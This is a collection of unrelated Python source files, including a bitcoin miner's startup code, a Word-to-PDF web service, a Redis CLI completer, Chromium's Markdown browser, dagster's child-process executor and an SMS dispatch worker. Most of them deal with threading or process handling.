settings: settings['hashmeter'] = 0 if 'scantime' not in settings: settings['scantime'] = 30L if 'rpcuser' not in settings or 'rpcpass' not in settings: print "Missing username and/or password in cfg file" sys.exit(1) settings['port'] = int(settings['port']) settings['threads'] = int(settings['threads']) settings['hashmeter'] = int(settings['hashmeter']) settings['scantime'] = long(settings['scantime']) thr_list = [] for thr_id in range(settings['threads']): p = Process(target=miner_thread, args=(thr_id,)) p.start() thr_list.append(p) time.sleep(1) # stagger threads print settings['threads'], "mining threads started" print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port']) try: for thr_proc in thr_list: thr_proc.join() except KeyboardInterrupt: pass print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
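# Hedged example of the CONFIG-FILE format parsed above: one key=value per line and '#'
# starts a comment. The credential values are placeholders; the others match the defaults
# set in the code (host, port, threads, hashmeter, scantime).
#
#   # pyminer.cfg
#   host=127.0.0.1
#   port=9342
#   rpcuser=someuser
#   rpcpass=somepassword
#   threads=4
#   hashmeter=1
#   scantime=30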
fastconditiontimedchangecalculator.py
from crestdsl import model from crestdsl import sourcehelper as SH import ast from .to_z3 import Z3Converter, get_z3_variable, get_z3_var, get_z3_value, get_minimum_dt_of_several from .z3conditionchangecalculator import Z3ConditionChangeCalculator, get_behaviour_change_dt_from_constraintset from .z3calculator import Z3Calculator from .conditiontimedchangecalculator import ConditionTimedChangeCalculator from .contextconditiontimedchangecalculator import ContextConditionTimedChangeCalculator, translate_to_context import multiprocessing import queue import threading import z3 from crestdsl.config import to_python from .epsilon import Epsilon, eps_string from types import SimpleNamespace import logging logger = logging.getLogger(__name__) # TODO: extract this function and put in a central place # also do this in other files def log_if_level(level, message): """Logs the message if the level is below the specified level""" if logger.getEffectiveLevel() <= level: logger.log(level, message) class FastConditionTimedChangeCalculator(ContextConditionTimedChangeCalculator): """ THIS CLASS IS NEITHER FAST, NOR USEFUL. DELETE IT !!! """ def calculate_system(self, entity=None, include_subentities=True): logger.debug("FAST: Calculating for all entities") if not hasattr(self, "cache"): self.init_z3_constraints_and_vars() all_dts = [] """ setup workers with own context for each """ job_queue = queue.Queue() num_threads = 4 thread_workers = [] for i in range(num_threads): new_cache = translate_to_context(self.cache, z3.Context()) thread_worker = threading.Thread(target=self.thread_crawler, args=(job_queue,new_cache,all_dts)) thread_worker.setDaemon(True) thread_worker.start() """ Fill queue with stuff to do """ # TODO: check for transitions whether they can be done by time only for trans in model.get_all_transitions(entity): if trans._parent.current is trans.source: job_queue.put( (self.get_transition_time, trans) ) for influence in model.get_all_influences(entity): if self.contains_if_condition(influence): job_queue.put( (self.get_condition_change_enablers, influence) ) # updates = [up for up in get_updates(self.entity) if up.state == up._parent.current] for update in model.get_all_updates(entity): if update.state is update._parent.current: # only the currently active updates if self.contains_if_condition(update): job_queue.put( (self.get_condition_change_enablers, update) ) """ wait for queue to finish """ job_queue.join() for tw in thread_workers: assert not tw.isAlive() # """ do the other things """ # workers = [] # for influence in model.get_all_influences(entity): # if self.contains_if_condition(influence): # ctx_i = z3.Context() # new_cache = translate_to_context(self.cache, ctx_i) # worker = threading.Thread(target=self.get_condition_change_enablers, args=(influence, all_dts, new_cache)) # worker.start() # workers.append(worker) # worker.join() # # # # updates = [up for up in get_updates(self.entity) if up.state == up._parent.current] # for update in model.get_all_updates(entity): # if update.state is update._parent.current: # only the currently active updates # if self.contains_if_condition(update): # ctx_i = z3.Context() # new_cache = translate_to_context(self.cache, ctx_i) # worker = threading.Thread(target=self.get_condition_change_enablers, args=(update, all_dts, new_cache)) # worker.start() # workers.append(worker) # worker.join() # # # TODO: check for transitions whether they can be done by time only # for trans in model.get_all_transitions(entity): # if trans._parent.current is trans.source: 
# ctx_i = z3.Context() # new_cache = translate_to_context(self.cache, ctx_i) # worker = threading.Thread(target=self.get_transition_time, args=(trans, all_dts, new_cache)) # worker.start() # workers.append(worker) # worker.join() # print(f"Working on {len(workers)} threads") # for worker in workers: # worker.join() """ Return all behaviour change times """ return all_dts def thread_crawler(self, job_queue, cache, all_dts): """ worker thread that one by one executes an SMT task in its context """ while True: (method, modif) = job_queue.get() method(modif, all_dts, cache) job_queue.task_done() return True
Time_API.py
''' Python side of the time api. This provides actual realtime timer support, which will work within a single frame (which is otherwise not possible with X4's internal timer). ''' from X4_Python_Pipe_Server import Pipe_Server, Pipe_Client import time import threading # Name of the pipe to use. pipe_name = 'x4_time' # Flag to do a test run with the pipe client handled in python instead # of x4. test_python_client = 0 def main(args): ''' Entry function for this server. Protocol: x4 sends some request, pipe server responds (or not) based on command. The pipe server will never send messages on its own. ''' # Enable test mode if requested. if args['test']: global test_python_client test_python_client = True # Set up the pipe and connect to x4. pipe = Pipe_Server(pipe_name) # For python testing, kick off a client thread. if test_python_client: # Set up the reader in another thread. reader_thread = threading.Thread(target = Pipe_Client_Test) reader_thread.start() # Wait for client. pipe.Connect() # Var to hold the last tic time. last_tic = 0 while 1: # Blocking wait for a message from x4. message = pipe.Read() if test_python_client: print(pipe_name + ' server got: ' + message) # React based on command. if message == 'ping': # Ignore any setup pings. pass elif message == 'get': # Return current time. pipe.Write(time.perf_counter()) elif message == 'tic': # Record current time in prep for toc. last_tic = time.perf_counter() elif message == 'toc': # Return time since the tic. pipe.Write(time.perf_counter() - last_tic) else: print('Error:' + pipe_name + ' unrecognized command: ' + message) # TODO: maybe use time.sleep(?) for a bit if ever switching to # non-blocking reads. return def Pipe_Client_Test(): ''' Function to mimic the x4 client. ''' pipe = Pipe_Client(pipe_name) # Run a number of tests, to see how time values progress. for _ in range(5): # Send commands. for command in ['ping', 'get', 'tic', 'toc']: pipe.Write(command) # Capture and print responses. for _ in range(2): response = pipe.Read() print(pipe_name + ' client got: ' + response) return
office_service.py
# (c) 2014 - Felipe Astroza Araya # Under BSD License import os import win32com.client as win32 import pythoncom import md5 import time import threading from bottle import route, run, request, static_file, Bottle, HTTPError app = Bottle() UPLOAD_PATH = os.getcwd()+'\\uploads' PDF_PATH = os.getcwd()+'\\pdfs' gc_list = [] GC_SLEEP_TIME = 60*5 class GCFile: def __init__(self, path): self.file_path = path self.creation_time = time.time() gc_list.append(self) def is_waste(self): if time.time() - self.creation_time >= GC_SLEEP_TIME: return True return False def gc_thread(): while(True): for f in gc_list: if f.is_waste(): print "\nGC: Removing " + f.file_path + "\n" os.remove(f.file_path) gc_list.remove(f) time.sleep(GC_SLEEP_TIME) class WorkQueueThread(threading.Thread): def __init__(self): self.queue_sem = threading.Semaphore(0) self.queue = [] threading.Thread.__init__(self) def append(self, item): self.queue.append(item) self.queue_sem.release() def doc_to_pdf(self, item): doc = self.wapp.Documents.Open(item.word_file_path) pdf_path = PDF_PATH+'\\'+item.word_filename+'.pdf' doc.SaveAs(pdf_path, FileFormat=17) doc.Close(False) GCFile(pdf_path) def cleanup_doc(self, item): doc = self.wapp.Documents.Open(item.word_file_path) doc.RemoveDocumentInformation(4) doc.Save() doc.Close(False) def run(self): pythoncom.CoInitialize() self.wapp = None services = [self.doc_to_pdf, self.cleanup_doc] while(True): if self.queue_sem.acquire(False) == False: if self.wapp != None: self.wapp.Application.Quit() print "\nWorkQueueThread: Word Application was closed\n" self.queue_sem.acquire() # Espera por un trabajo self.wapp = win32.Dispatch('Word.Application') self.wapp.Visible = False self.wapp.DisplayAlerts = False print "\nWorkQueueThread: Work Application just started\n" item = self.queue.pop(0) print "\nWorkQueueThread: Processing %s service_type=%d\n" % (item.word_file_path, item.service_type) if item.service_type < len(services): services[item.service_type](item) else: print "\nWorkQueueThread: Invalid service_type(=%d)\n" % (item.service_type) item.lock.release() class WorkQueueItem: def __init__(self, path, word_filename, orig_filename, filename_ext, service_type): self.word_file_path = path self.orig_filename = orig_filename self.filename_ext = filename_ext self.word_filename = word_filename self.service_type = service_type self.lock = threading.Semaphore(0) worker_thread.append(self) def wait_work(self): self.lock.acquire() def save_word_file(): upload = request.files.get('upload') name, ext = os.path.splitext(upload.filename) if ext not in ('.doc','.docx'): raise HTTPError(404, "Solo archivos MS Word son permitidos: " + ext) name_hash = md5.md5(name+str(time.time())).hexdigest() save_file = open(UPLOAD_PATH+'\\'+name_hash+ext, "wb") save_file.write(upload.file.read()) save_file.close() return name, ext, name_hash+ext @app.route('/to/pdf', method='POST') def convert_to_pdf(): orig_word_filename, ext, word_filename = save_word_file() word_file_path = UPLOAD_PATH+'\\'+word_filename item = WorkQueueItem(word_file_path, word_filename, orig_word_filename, ext, 0) item.wait_work() # Espera por la conversion os.remove(word_file_path) return static_file(word_filename+'.pdf', root=PDF_PATH, download=orig_word_filename+'.pdf') @app.route('/cleanup/word', method='POST') def cleanup_word(): orig_word_filename, ext, word_filename = save_word_file() word_file_path = UPLOAD_PATH+'\\'+word_filename item = WorkQueueItem(word_file_path, word_filename, orig_word_filename, ext, 1) item.wait_work() # Espera por la limpieza 
    GCFile(word_file_path)
    return static_file(word_filename, root=UPLOAD_PATH, download=orig_word_filename+ext)

def main():
    # worker_thread is looked up as a module-level global by WorkQueueItem.__init__,
    # so it must be declared global here instead of being left as a local variable.
    global worker_thread
    worker_thread = WorkQueueThread()
    gc = threading.Thread(target=gc_thread)
    gc.start()
    worker_thread.start()
    run(app, server='paste', host='0.0.0.0', port=8080)

if __name__ == "__main__":
    main()
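# Hedged usage sketch (assumed client commands, not part of the service): both endpoints
# expect a multipart form field named 'upload' and stream the converted or cleaned file
# back, e.g. with curl:
#
#   curl -F "upload=@report.docx" http://localhost:8080/to/pdf -o report.pdf
#   curl -F "upload=@report.docx" http://localhost:8080/cleanup/word -o report_clean.docx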
completers.py
import time import threading import logging from typing import Iterable from prompt_toolkit.contrib.regular_languages.completion import GrammarCompleter from prompt_toolkit.contrib.regular_languages.compiler import compile from prompt_toolkit.completion import WordCompleter, FuzzyWordCompleter from prompt_toolkit.document import Document from prompt_toolkit.completion import Completion, CompleteEvent from .config import config, COMPILING_DONE, COMPILING_JUST_FINISH from .redis_grammar import REDIS_COMMANDS, CONST from .lexer import get_lexer from .commands_csv_loader import group2commands, commands_summary, all_commands logger = logging.getLogger(__name__) class LatestUsedFirstWordCompleter(FuzzyWordCompleter): """ Not thread safe. """ def __init__(self, max_words, words, *args, **kwargs): self.words = words self.max_words = max_words super().__init__(words, *args, **kwargs) def touch(self, word): """ Make sure word is in the first place of the completer list. """ if word in self.words: self.words.remove(word) else: # not in words if len(self.words) == self.max_words: # full self.words.pop() self.words.insert(0, word) def touch_words(self, words): for word in words: self.touch(word) class FakeDocument: pass class RedisGrammarCompleter(GrammarCompleter): """ This disable Completer on blank characters, blank char will cause performance issues. """ def get_completions( self, document: Document, complete_event: CompleteEvent ) -> Iterable[Completion]: origin_text = document.text_before_cursor stripped = FakeDocument() stripped.text_before_cursor = origin_text.lstrip() # Do not complete on spaces, too slow if not origin_text.strip(): return [] return super().get_completions(stripped, complete_event) def get_completer(group2commands, redis_grammar): completer_mapping = {} # patch command completer with hint command_hint = {key: info["summary"] for key, info in commands_summary.items()} for command_group, commands in group2commands.items(): words = commands + [command.lower() for command in commands] if config.newbie_mode: hint = {command: command_hint.get(command.upper()) for command in words} else: hint = None completer_mapping[command_group] = WordCompleter( words, sentence=True, meta_dict=hint ) key_completer = LatestUsedFirstWordCompleter(config.completer_max, []) member_completer = LatestUsedFirstWordCompleter(config.completer_max, []) field_completer = LatestUsedFirstWordCompleter(config.completer_max, []) completer_mapping.update( { key: WordCompleter(tokens.split(" "), ignore_case=True) for key, tokens in CONST.items() } ) completer_mapping.update( { # all key related completers share the same completer "keys": key_completer, "key": key_completer, "destination": key_completer, "newkey": key_completer, # member "member": member_completer, "members": member_completer, # hash fields "field": field_completer, "fields": field_completer, } ) completer_mapping["commandname"] = WordCompleter(all_commands, ignore_case=True) completer = RedisGrammarCompleter(redis_grammar, completer_mapping) return completer def compile_grammar_bg(session): """ compile redis grammar in a thread, and patch session's lexer and completer. """ def compile_and_patch(session): start_time = time.time() logger.debug("[compile] start compile grammer...") redis_grammar = compile(REDIS_COMMANDS) end_time = time.time() logger.debug(f"[compile] Compile finished! 
Cost: {end_time - start_time}") # get lexer lexer = get_lexer(group2commands.keys(), redis_grammar) # get completer completer = get_completer(group2commands, redis_grammar) session.completer = completer session.lexer = lexer logger.debug("[compile] Patch finished!") config.compiling = COMPILING_JUST_FINISH time.sleep(1) config.compiling = COMPILING_DONE compiling_thread = threading.Thread(target=compile_and_patch, args=(session,)) compiling_thread.start()
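# Hedged usage sketch (assumption, not part of this module): compile_grammar_bg expects an
# object with writable `completer` and `lexer` attributes, typically the prompt_toolkit
# PromptSession created at startup:
#
#   from prompt_toolkit import PromptSession
#   session = PromptSession()
#   compile_grammar_bg(session)  # returns immediately; completer/lexer are patched later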
md_browser.py
#!/usr/bin/env python # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Simple Markdown browser for a Git checkout.""" from __future__ import print_function import SimpleHTTPServer import SocketServer import argparse import codecs import os import re import socket import sys import threading import time import webbrowser from xml.etree import ElementTree THIS_DIR = os.path.realpath(os.path.dirname(__file__)) SRC_DIR = os.path.dirname(os.path.dirname(THIS_DIR)) sys.path.insert(0, os.path.join(SRC_DIR, 'third_party', 'Python-Markdown')) import markdown def main(argv): parser = argparse.ArgumentParser(prog='md_browser') parser.add_argument('-p', '--port', type=int, default=8080, help='port to run on (default = %(default)s)') parser.add_argument('-d', '--directory', type=str, default=SRC_DIR) parser.add_argument('file', nargs='?', help='open file in browser') args = parser.parse_args(argv) top_level = os.path.realpath(args.directory) s = Server(args.port, top_level) print('Listening on http://localhost:%s/' % args.port) thread = None if args.file: path = os.path.realpath(args.file) if not path.startswith(top_level): print('%s is not under %s' % (args.file, args.directory)) return 1 rpath = os.path.relpath(path, top_level) url = 'http://localhost:%d/%s' % (args.port, rpath) print('Opening %s' % url) thread = threading.Thread(target=_open_url, args=(url,)) thread.start() elif os.path.isfile(os.path.join(top_level, 'docs', 'README.md')): print(' Try loading http://localhost:%d/docs/README.md' % args.port) elif os.path.isfile(os.path.join(args.directory, 'README.md')): print(' Try loading http://localhost:%d/README.md' % args.port) retcode = 1 try: s.serve_forever() except KeyboardInterrupt: retcode = 130 except Exception as e: print('Exception raised: %s' % str(e)) s.shutdown() if thread: thread.join() return retcode def _open_url(url): time.sleep(1) webbrowser.open(url) def _gitiles_slugify(value, _separator): """Convert a string (representing a section title) to URL anchor name. This function is passed to "toc" extension as an extension option, so we can emulate the way how Gitiles converts header titles to URL anchors. Gitiles' official documentation about the conversion is at: https://gerrit.googlesource.com/gitiles/+/master/Documentation/markdown.md#Named-anchors Args: value: The name of a section that is to be converted. _separator: Unused. This is actually a configurable string that is used as a replacement character for spaces in the title, typically set to '-'. Since we emulate Gitiles' way of slugification here, it makes little sense to have the separator charactor configurable. """ # TODO(yutak): Implement accent removal. This does not seem easy without # some library. For now we just make accented characters turn into # underscores, just like other non-ASCII characters. value = value.encode('ascii', 'replace') # Non-ASCII turns into '?'. value = re.sub(r'[^- a-zA-Z0-9]', '_', value) # Non-alphanumerics to '_'. value = value.replace(u' ', u'-') value = re.sub(r'([-_])[-_]+', r'\1', value) # Fold hyphens and underscores. 
return value class Server(SocketServer.TCPServer): def __init__(self, port, top_level): SocketServer.TCPServer.__init__(self, ('0.0.0.0', port), Handler) self.port = port self.top_level = top_level self.retcode = None def server_bind(self): self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.socket.bind(self.server_address) class Handler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): path = self.path # strip off the repo and branch info, if present, for compatibility # with gitiles. if path.startswith('/chromium/src/+/master'): path = path[len('/chromium/src/+/master'):] full_path = os.path.realpath(os.path.join(self.server.top_level, path[1:])) if not full_path.startswith(self.server.top_level): self._DoUnknown() elif path == '/doc.css': self._DoCSS('doc.css') elif not os.path.exists(full_path): self._DoNotFound() elif path.lower().endswith('.md'): self._DoMD(path) elif os.path.exists(full_path + '/README.md'): self._DoMD(path + '/README.md') else: self._DoUnknown() def _DoMD(self, path): extensions = [ 'markdown.extensions.def_list', 'markdown.extensions.fenced_code', 'markdown.extensions.tables', 'markdown.extensions.toc', 'gitiles_ext_blocks', ] extension_configs = { 'markdown.extensions.toc': { 'slugify': _gitiles_slugify }, } contents = self._Read(path[1:]) md = markdown.Markdown(extensions=extensions, extension_configs=extension_configs, output_format='html4') has_a_single_h1 = (len([line for line in contents.splitlines() if (line.startswith('#') and not line.startswith('##'))]) == 1) md.treeprocessors['adjust_toc'] = _AdjustTOC(has_a_single_h1) md_fragment = md.convert(contents).encode('utf-8') try: self._WriteHeader('text/html') self._WriteTemplate('header.html') self.wfile.write(md_fragment) self._WriteTemplate('footer.html') except: raise def _DoCSS(self, template): self._WriteHeader('text/css') self._WriteTemplate(template) def _DoNotFound(self): self._WriteHeader('text/html', status_code=404) self.wfile.write('<html><body>%s not found</body></html>' % self.path) def _DoUnknown(self): self._WriteHeader('text/html') self.wfile.write('<html><body>I do not know how to serve %s.</body>' '</html>' % self.path) def _Read(self, relpath, relative_to=None): if relative_to is None: relative_to = self.server.top_level assert not relpath.startswith(os.sep) path = os.path.join(relative_to, relpath) with codecs.open(path, encoding='utf-8') as fp: return fp.read() def _WriteHeader(self, content_type='text/plain', status_code=200): self.send_response(status_code) self.send_header('Content-Type', content_type) self.end_headers() def _WriteTemplate(self, template): contents = self._Read(os.path.join('tools', 'md_browser', template), relative_to=SRC_DIR) self.wfile.write(contents.encode('utf-8')) class _AdjustTOC(markdown.treeprocessors.Treeprocessor): def __init__(self, has_a_single_h1): super(_AdjustTOC, self).__init__() self.has_a_single_h1 = has_a_single_h1 def run(self, tree): # Given # # # H1 # # [TOC] # # ## first H2 # # ## second H2 # # the markdown.extensions.toc extension generates: # # <div class='toc'> # <ul><li><a>H1</a> # <ul><li>first H2 # <li>second H2</li></ul></li><ul></div> # # for [TOC]. But, we want the TOC to have its own subheading, so # we rewrite <div class='toc'><ul>...</ul></div> to: # # <div class='toc'> # <h2>Contents</h2> # <div class='toc-aux'> # <ul>...</ul></div></div> # # In addition, if the document only has a single H1, it is usually the # title, and we don't want the title to be in the TOC. 
So, we remove it # and shift all of the title's children up a level, leaving: # # <div class='toc'> # <h2>Contents</h2> # <div class='toc-aux'> # <ul><li>first H2 # <li>second H2</li></ul></div></div> for toc_node in tree.findall(".//*[@class='toc']"): toc_ul = toc_node[0] if self.has_a_single_h1: toc_ul_li = toc_ul[0] ul_with_the_desired_toc_entries = toc_ul_li[1] else: ul_with_the_desired_toc_entries = toc_ul toc_node.remove(toc_ul) contents = ElementTree.SubElement(toc_node, 'h2') contents.text = 'Contents' contents.tail = '\n' toc_aux = ElementTree.SubElement(toc_node, 'div', {'class': 'toc-aux'}) toc_aux.text = '\n' toc_aux.append(ul_with_the_desired_toc_entries) toc_aux.tail = '\n' if __name__ == '__main__': sys.exit(main(sys.argv[1:]))
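# Hedged invocation examples, derived from the argparse options above (the script path is
# an assumption based on the template directory this file reads from):
#
#   python tools/md_browser/md_browser.py                         # serve SRC_DIR on port 8080
#   python tools/md_browser/md_browser.py -p 9000 docs/README.md  # open a specific file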
DLThreadPool.py
# import logging
import threading
import time

from . import DLCommon as cv


class ThreadPool:
    def __init__(self, daemon):
        self._daemon = daemon
        self._threads = []
        self._insp_thr_ = None
        self._app_lock = threading.Lock()

    def Thread(self, *args, **kwargs):
        with self._app_lock:
            thr = Thread(*args, daemon=self._daemon, **kwargs)
            self._threads.append(thr)
            # Lazily (re)start the inspector thread that prunes dead threads.
            if not self._insp_thr_ or self._insp_thr_.isStoped():
                self._insp_thr_ = Thread(target=self.__insp__,
                                         name=cv.THREADPOOL,
                                         daemon=self._daemon)
                self._insp_thr_.start()
            return thr

    def setDaemon(self, daemonic):
        self._daemon = daemonic

    def __insp__(self):
        while True:
            with self._app_lock:
                for i in list(self._threads):
                    if i._started.is_set() and not i.is_alive():
                        self._threads.remove(i)
                if not self._threads:
                    break
            time.sleep(0.1)

    def isAllDead(self):
        if len(self._threads) == 0:
            return True
        elif len(self._threads) == 1:
            # The only remaining thread may be the caller itself.
            return self._threads[0] is threading.current_thread()
        else:
            return False

    def getPoolThreads(self):
        return self._threads

    def get(self, name):
        for i in self._threads:
            if i.name == name:
                return i

    def getAll(self, name):
        threads = []
        for i in list(self._threads):
            if i.name == name:
                threads.append(i)
        return threads


class Thread(threading.Thread):
    def __init__(self, *args, **kwargs):
        threading.Thread.__init__(self, *args, **kwargs)

    def isStarted(self):
        return self._started.is_set()

    def isRunning(self):
        return self._started.is_set() and self.is_alive()

    def isStoped(self):
        self.is_alive()  # easy way to get ._is_stopped set when appropriate
        return self._is_stopped

    def isInitial(self):
        return not self.isStarted() and not self.isStoped()
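# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): spawning a few
# workers through the pool and waiting until the inspector thread has pruned
# them all.  The worker function and thread names are made up for the example.
# ---------------------------------------------------------------------------
def _example_usage():
    pool = ThreadPool(daemon=True)

    def worker(n):
        time.sleep(0.2 * n)

    for n in range(3):
        pool.Thread(target=worker, args=(n,), name='worker-%d' % n).start()

    # isAllDead() becomes True once every finished worker has been removed
    # from the pool (the calling thread itself is not tracked by the pool).
    while not pool.isAllDead():
        time.sleep(0.1)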
child_process_executor.py
'''Facilities for running arbitrary commands in child processes.''' import os import queue import sys from abc import ABCMeta, abstractmethod from collections import namedtuple import six from dagster import check from dagster.seven import multiprocessing from dagster.utils.error import serializable_error_info_from_exc_info class ChildProcessEvent(object): pass class ChildProcessStartEvent(namedtuple('ChildProcessStartEvent', 'pid'), ChildProcessEvent): pass class ChildProcessDoneEvent(namedtuple('ChildProcessDoneEvent', 'pid'), ChildProcessEvent): pass class ChildProcessSystemErrorEvent( namedtuple('ChildProcessSystemErrorEvent', 'pid error_info'), ChildProcessEvent ): pass class ChildProcessCommand(six.with_metaclass(ABCMeta)): # pylint: disable=no-init '''Inherit from this class in order to use this library. The object must be picklable; instantiate it and pass it to _execute_command_in_child_process.''' @abstractmethod def execute(self): ''' This method is invoked in the child process. Yields a sequence of events to be handled by _execute_command_in_child_process.''' class ChildProcessCrashException(Exception): '''Thrown when the child process crashes.''' def __init__(self, exit_code=None): self.exit_code = exit_code def _execute_command_in_child_process(event_queue, command): '''Wraps the execution of a ChildProcessCommand. Handles errors and communicates across a queue with the parent process.''' check.inst_param(command, 'command', ChildProcessCommand) pid = os.getpid() event_queue.put(ChildProcessStartEvent(pid=pid)) try: for step_event in command.execute(): event_queue.put(step_event) event_queue.put(ChildProcessDoneEvent(pid=pid)) except (Exception, KeyboardInterrupt): # pylint: disable=broad-except event_queue.put( ChildProcessSystemErrorEvent( pid=pid, error_info=serializable_error_info_from_exc_info(sys.exc_info()) ) ) finally: event_queue.close() TICK = 20.0 * 1.0 / 1000.0 '''The minimum interval at which to check for child process liveness -- default 20ms.''' PROCESS_DEAD_AND_QUEUE_EMPTY = 'PROCESS_DEAD_AND_QUEUE_EMPTY' '''Sentinel value.''' def _poll_for_event(process, event_queue): try: return event_queue.get(block=True, timeout=TICK) except KeyboardInterrupt as e: return e except queue.Empty: if not process.is_alive(): # There is a possibility that after the last queue.get the # process created another event and then died. In that case # we want to continue draining the queue. try: return event_queue.get(block=False) except queue.Empty: # If the queue empty we know that there are no more events # and that the process has died. return PROCESS_DEAD_AND_QUEUE_EMPTY return None def execute_child_process_command(command): '''Execute a ChildProcessCommand in a new process. This function starts a new process whose execution target is a ChildProcessCommand wrapped by _execute_command_in_child_process; polls the queue for events yielded by the child process until the process dies and the queue is empty. This function yields a complex set of objects to enable having multiple child process executions in flight: * None - nothing has happened, yielded to enable cooperative multitasking other iterators * ChildProcessEvent - Family of objects that communicates state changes in the child process * KeyboardInterrupt - Yielded in the case that an interrupt was recieved while polling the child process. 
Yielded instead of raised to allow forwarding of the interrupt to the child and completion of the iterator for this child and any others that may be executing * The actual values yielded by the child process command Args: command (ChildProcessCommand): The command to execute in the child process. Warning: if the child process is in an infinite loop, this will also infinitely loop. ''' check.inst_param(command, 'command', ChildProcessCommand) event_queue = multiprocessing.Queue() process = multiprocessing.Process( target=_execute_command_in_child_process, args=(event_queue, command) ) process.start() completed_properly = False while not completed_properly: event = _poll_for_event(process, event_queue) if event == PROCESS_DEAD_AND_QUEUE_EMPTY: break yield event if isinstance(event, (ChildProcessDoneEvent, ChildProcessSystemErrorEvent)): completed_properly = True if not completed_properly: # TODO Figure out what to do about stderr/stdout raise ChildProcessCrashException(exit_code=process.exitcode) process.join()
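# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module): a trivial
# ChildProcessCommand and the polling loop a caller would run around
# execute_child_process_command.  DoubleCommand and its payload are made up
# for the example.
# ---------------------------------------------------------------------------
class DoubleCommand(ChildProcessCommand):
    '''Doubles each number in the child process and yields the results.'''

    def __init__(self, numbers):
        self.numbers = numbers

    def execute(self):
        for number in self.numbers:
            yield number * 2


def _example_usage():
    for event in execute_child_process_command(DoubleCommand([1, 2, 3])):
        if event is None:
            continue  # nothing happened this tick; yield control elsewhere
        if isinstance(event, KeyboardInterrupt):
            raise event  # or forward the interrupt to other child processes
        if isinstance(event, ChildProcessEvent):
            continue  # start/done/system-error notifications
        print('child produced', event)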
main.py
import json import redis import threading import logging from psycopg2.pool import ThreadedConnectionPool from core.events.oktell import OktellOrderAccepted from core.coreapi import TMAPI from .kts.channels import Channel, Channels from .config import REDIS, CHANNELS, DSN, TME_DB from orders.database import AsteriskSounds LOGGER = logging.getLogger() def enrich_data(data): with TMAPI.PG_POOL.getconn() as pgcon: with pgcon.cursor() as c: c.execute(( 'select o.driver_timecount, ' 'o.discountedsumm, o.clientid as client_id, ' 'o.driverid, o.cashless, o.state, o.phone, ' 'cr.gosnumber, cr.color as car_color, ' 'cr.mark as car_mark, coalesce(cr.model, \'\') as car_model, ' 'cr.id as car_id, o.source_time ' 'from orders o ' 'join crews cw on (cw.id=o.crewid) ' 'join cars cr on (cr.id=cw.carid) ' 'where o.id=%(order_id)s;'), {'order_id': data['order_id']}) r = c.fetchone() if r: order_data = {cn.name :r[ix] for ix, cn in enumerate(c.description)} data.update(**order_data) return data def get_distributor(phone, db): LOGGER.debug(phone) phone = phone[-10:] SELECT = 'select sc.id, d.address, c.port as channel, count(sms.*) as sim_count, dst.name, dst_sms.sms '\ 'from routes_mask roma '\ 'join regions reg on (reg.id=roma.region_id) '\ 'join operators op on (op.id=roma.operator_id) '\ 'join distributors dst on (dst.id=op.distributor_id or dst.id=0) '\ 'left join distributors dst_sms on (dst_sms.id=op.distributor_id) '\ 'join sim_cards sc on (sc.distributor_id=dst.id) '\ 'join channels c on (c.id=sc.channel_id) '\ 'join devices d on (d.id=c.device_id) '\ 'left join sms on (sms.sim_id=sc.id and sms.date_time > %s and sms.direction=1) '\ 'where (roma.aaa=%s and %s between roma.range_a and roma.range_b) and '\ 'sc.direction=2 and sc.is_active and (reg.is_home or dst.all_home) and '\ '(dst_sms.sms or (dst_sms.id = dst.id)) '\ 'group by sc.id, d.address, c.port, dst.id, dst_sms.sms '\ 'order by dst.id desc, sim_count '\ 'limit 1;' date_time = datetime.datetime.now() date_time = datetime.datetime( date_time.year, date_time.month, date_time.day, 0, 0, 0) ARGS = (date_time, phone[:3], int(phone[3:]), ) # logger.debug('get_distributor: %s %s' % (SELECT, ARGS)) c = db.cursor() c.execute(SELECT, ARGS) try: sim_id, address, channel, _, distributor, _ = c.fetchone() channel %= 5060 except Exception as e: LOGGER.warning('get_distributor exception 1: %s %s' % (e, phone)) sim_id, address, channel, _, distributor, _ = None, '', 0, 0, None, False c.close() LOGGER.debug('%s %s %s %s %s' % (phone, distributor, address, channel, sim_id)) # db.close() return sim_id, address, channel, distributor def register_channels(pg_pool): SELECT = ( 'select distinct d.address, c.port%5060 as port, dest.name ' 'from devices d ' 'join channels c on (c.device_id=d.id) ' 'join sim_cards sc on (sc.id=c.sim_id) ' 'join distributors dest on (dest.id=sc.distributor_id) ' 'where d.name like \'ะšะขะก%\' and c.is_active and sc.direction=2 ' 'order by d.address, port' ) channels = Channels(pg_pool, LOGGER) with pg_pool.getconn() as pgconn: with pgconn.cursor() as c: c.execute(SELECT) [channels.register(Channel(address=ch[0], channel=ch[1]), distributor=ch[-1]) for ch in c.fetchall()] return channels def main(): TMAPI.LOGGER = LOGGER TMAPI.ASTERISK_SOUNDS = AsteriskSounds() pg_pool = ThreadedConnectionPool(*DSN) TMAPI.PG_POOL = ThreadedConnectionPool(*TME_DB) channels = register_channels(pg_pool) redpool = redis.ConnectionPool(host=REDIS) r = redis.Redis(connection_pool=redpool) rs = r.pubsub() rs.subscribe(CHANNELS) for event in rs.listen(): 
        LOGGER.debug('Received %s', event)
        if event['type'] == 'message':
            LOGGER.debug('Got message: %s', event)
            channel = event['channel'].decode().split(':')[1]
            data = json.loads(event['data'])
            data = enrich_data(data)
            phones = data['phones'][0]
            data = TMAPI.create_message(channel, data)
            _channel = threading.Thread(
                target=channels.send_sms, args=(data['sms'], phones))
            _channel.start()
            LOGGER.debug('%s: %s', _channel, event)


if __name__ == '__main__':
    try:
        m = threading.Thread(target=main)
        m.start()
        m.join()
    except KeyboardInterrupt:
        exit(0)
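# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): publishing a test
# event that the pub/sub loop above would pick up.  The channel name
# 'sms:order_accepted' and the payload fields are assumptions inferred from
# the handler, which splits the channel on ':' and expects 'order_id' and
# 'phones' in the JSON body.
# ---------------------------------------------------------------------------
def _publish_test_event():
    r = redis.Redis(host=REDIS)
    payload = {'order_id': 12345, 'phones': ['+70000000000']}
    r.publish('sms:order_accepted', json.dumps(payload))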
agent.py
